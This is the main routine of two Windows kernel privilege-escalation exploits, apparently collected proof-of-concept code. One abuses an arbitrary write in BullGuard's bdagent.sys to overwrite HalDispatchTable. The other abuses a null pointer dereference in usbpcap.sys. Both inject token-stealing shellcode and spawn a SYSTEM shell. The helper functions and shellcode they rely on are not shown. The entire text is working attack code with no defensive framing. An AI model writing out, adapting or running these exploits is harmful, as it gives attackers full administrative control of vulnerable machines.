int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "bdagent"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; }
int main(int argc, char *argv[]) { _NtAllocateVirtualMemory NtAllocateVirtualMemory; LPVOID addrtoshell; NTSTATUS allocstatus; LPVOID base_addr = (LPVOID)0x00000001; DWORD written; int rwresult; int size = BUFSIZE; HANDLE hDevice; DWORD dwRetBytes = 0; unsigned char buffer[BUFSIZE]; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit \n"); printf(" Tested on Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "usbpcap1"); addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell); memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7)); NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); return -1; } printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory); printf("[+] Allocating memory at [0x%p]\n", base_addr); allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocstatus) { printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError()); return -1; } printf("[+] NtAllocateVirtualMemory successful\n"); memset(buffer, 0x00, BUFSIZE); memcpy(buffer+0x0000006b, &addrtoshell, 4); rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); if (rwresult == 0) { printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); return -1; } printf("[+] WriteProcessMemory %d bytes written\n", written); printf("[+] Device handle %s\n", devhandle); hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL); CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); spawnShell(); return 0; }